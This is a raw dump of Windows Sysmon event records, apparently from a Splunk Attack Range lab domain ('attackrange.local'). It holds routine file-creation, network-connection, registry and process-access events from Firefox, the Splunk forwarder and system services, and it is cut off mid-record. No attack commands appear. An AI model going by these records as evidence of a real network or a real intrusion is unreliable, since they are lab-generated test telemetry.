Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FD8635D8D012BED953DA992CF1C89F4D,SHA256=549FA76B8850ACAFEBF81110D3E6653A51115C72732BDA2E0DD4EE364260D310,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053436Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E9190F29241629F1B6D800681C100B5E,SHA256=1CE1AD8E6E58E63EBC14FBDE27A28937D87BEE6E506A9C119F4C9B8E9ED9F878,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053435Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=1260F906185D49F65215E844AB252BB4,SHA256=55C978C79451CB8646EBFF863E54A7185544FE1B9C125BCB5E55DDBF58F4D115,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053434Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=64C3041734D80D9D998D3364CE0E644C,SHA256=C7CEF39EA07648FBE6CF4BECCD1C826456D4E4DEAE80EF41B357FC72CAECEAF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053433Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=A4ACDE12668D6234A76965BD1DC20852,SHA256=772E1FADDA8644BEACDF34144B31C23F4C191423B0718B8E7D95ECC88305F21F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BCBBA8DDF2C984A77F00B42FCE906F05,SHA256=CF81E76A3C366EAA6A782E43A929AE6D46B62967EFE7B81A51690E9D31AEB6FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=F8BB3BF9A6D8691CA55C057A89363751,SHA256=BC1A5A3C94333CBB33EB01124A5998B04C748C1D04E07C17F77F424C9E04A967,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=9212EE5EAC659C1C09936E8BA5861FCA,SHA256=B40F56BCF7BBC0C84B17C61826BECF0C689FB1AEBBFCDD61493908C610AC9F6C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0D6F28D072A36B45A04D3C81C3FD08B0,SHA256=7D05292E1A8086CF577CA957C88FA3F22A5A21D1FC13301CBBE76BBB9D779955,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0E9A92E28F8A490233AC7DC608F98239,SHA256=67084E25B33DF1C7AB28C89D686743E204AA873BC49026D89D828F2BD26459AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:41.030{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=7BBA2087AE43EDB29FB9F5DD99ED972B,SHA256=E58A213949C31D8B872F187B202F0E82C81089F22B64ECE30B8DE8526D6F62B0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053439Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:42.366{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0F15F2E155F595DD214EC524AA04C370,SHA256=ECBD2053E502985B95A934C82B4FE7C3E12BB55CD43104F268DCB13D9AC9E9B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809839Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:42.092{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E403318BD6ADC485E860B7F94D38A5,SHA256=0793E1A221AB9E2AF4974392592CBA6850EA52D91C2B5B86CF46CAF22494B17F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053440Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:43.381{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3930375F77E5B73F067766778BBF2AA7,SHA256=7D8B71699C9A27FAFD6C8980F27CC71DC4457E53ECF526F0AAA8369B02CC11FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809840Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:43.107{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70D83C20299F0792A914632C8F10A507,SHA256=1EF41B018F17852B748BA78DE291C1327C2417883416FBF5ED29391FD03EFEF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053441Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:44.396{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F262F16CAA396CDB7957773335A2D31B,SHA256=6EA3E34D7886E795953EB554EEC608C4F51E6E07D503E5F831E4542898A2BC47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809841Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:44.123{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF51036B175A6E44C173CF96E0FA8C05,SHA256=F9AF7A7B3DB01574A56518DB169E6ABC0D3607BDF48A5920B8A687A076160643,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053443Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:36.695{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61925-false10.0.1.12-8000- 23542300x80000000000000001053442Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:45.411{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66571F63B271D825637B73857C013D76,SHA256=59891E71C394AE380C72F7CAE6E59FC6FD68A0A8D03CBD0890A1C47A9F7A134E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809842Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:45.138{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACA84371D19E14206ECF56DD543EFA21,SHA256=F8094FB9C8506AAB0BC3BAE84B4E298DDDF495A19AE95C23BEF183EA4E498AC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.426{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69666971ED280E2F391AE7D51E71132B,SHA256=1BEE2FDD03535E911CD6788EC7D592935071C42EE44E6AC5578CDBFD630D0757,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809845Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:45.240{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57424-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 13241300x8000000000000000809844Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-SetValue2021-07-12 08:04:46.482{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d776f4-0x946a8e49) 23542300x8000000000000000809843Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:46.154{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=75D04D4AA36800C6271C332B98CA99C6,SHA256=4C3738E715A192F61CB00C525CF79A58F05814CE606773FF2EB84A5CA586AF50,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E70B0119E2FC34D8C8F1751222D06E2A,SHA256=19F2F7766BC54600DF6671A14C2548521950CE3CD035220E4E235E1B15988C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=093B2B40F88A9FB052E5702160B1C500,SHA256=C60CB6997903E26CCC3C9297D05CD90380D88495889CDE53A41055C284F98114,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=34F539167181D87298AA1821CB68C25D,SHA256=A50AF58F8368FC9696156E132F6C0E44A426ADD6032385A5F663291957B4B0AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=EA311F0E2DD3CB03856D5134A4F84839,SHA256=945A07B3E93766C28D920E05E779E2405300D08C551290661792BC7F53021F68,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053450Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C43F220FF237F9328789AAA7F835A874,SHA256=9D925D1E68F389098F8A5E99342A425D2D4D5F6F5E3A250A437A0869CF66D716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053449Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=269A2AA2A2523178385AB3B10B805D8C,SHA256=FD88BBF9334E2163D83ADBCEF677A408980C61079891443EDE475DD9ECBD22F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053448Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=87E654171B7C8938CB59209C36347C9D,SHA256=33B7EE500773C99D60F516907B6C7A439BAA15E765C3E383D0EB7696EF160332,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053447Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=149D5819F537070750FC74B7D5D1942D,SHA256=9F676A89D09321E7C15F50E4E36C8AD1AAEFCEAD1F9F03BAD8B3616C793B84DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053446Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=8D024F39F900B5C08343BBC254427D9F,SHA256=61B0393A0F3C7DCF2A588EF33F7B4D99D81DDA33DC8D59DD2CF76C8F9CE3768E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053445Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=28FF8F4A24CAEB1B8EDB8513106861B3,SHA256=436080004D8E7051F4EC0C8CB90733F3C0874E55A26ACF1A4A59904E35718657,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053444Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:46.064{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B68CA6A8B0D388CE9EE0DC62CEBF12A8,SHA256=1F905DE1DD5EB950194C54A8CEEC58F3C62CB907F2D89E3D3BF58FE32C7A78ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:47.426{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE346BDB900A44D932E91B4A83135F1,SHA256=2981252B171075BD4409D3E440762DC384BA20324AFEB6575853CD801BA5B81C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809846Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:47.170{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA52B307778F042E0CE06C747887F807,SHA256=7091EF5C37699E03B463757046E8F4AA9E2D8E42487B6872EB470C1F2001AB1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:48.444{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50DB7738C6226630DAFD0CDEC2F00312,SHA256=A4AEDBAD9B73A10B35115CD9ABB7A9E8DBA9CBB52AA67A1C42EBAF91F71672FE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809853Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:47.167{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57425-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 354300x8000000000000000809852Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:46.861{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-22873-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x8000000000000000809851Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:46.615{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse20.101.57.9-123ntp 354300x8000000000000000809850Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:46.615{0C1E0330-0490-60E8-1100-00000000D001}988C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudptruefalse10.0.1.15win-host-623.attackrange.local123ntpfalse10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal123ntp 23542300x8000000000000000809849Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:48.170{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B00B9FBD0A011D76D8DD094C713CA8FD,SHA256=0D1250EBF216489F87E6DD1D9C7D9AAEC7860EE36662B303D9476BD0F9B6106F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:40.546{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57425-false10.0.1.14win-dc-890.attackrange.local49676- 354300x80000000000000001053457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:39.993{466BC892-02AF-60E8-1000-00000000CF01}432C:\Windows\System32\svchost.exeNT AUTHORITY\LOCAL SERVICEudpfalsefalse10.0.1.14win-dc-890.attackrange.local123ntpfalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal123ntp 23542300x8000000000000000809848Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:48.029{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8761821C944218C34A864EACE2D55A4,SHA256=0759E34E22F08CD83D703DBE3D070878CEA7FF861B8B53B88EE492F769560407,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809847Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:48.029{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0D88D061634185C178D312CEC7130C89,SHA256=662D5254B5325DB38D14F8A30E52B75E990F707965312B378C4B9EDCA951BBA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:49.478{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64970F2047FD4B11EF8874FE20BB8301,SHA256=9655E31B5D0E63980CA3487BAF9D8927CE1DAC9A43D7E9874F4F31370D10838E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809854Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:49.201{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0CA47419AEEAA2C3F4C139038193456,SHA256=5699A4B3DB54FFE93E396414F0F6382B9FA2A805B475E8ED02D8664492017EFD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.761{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A2-60EB-D17D-00000000CF01}396C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.746{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 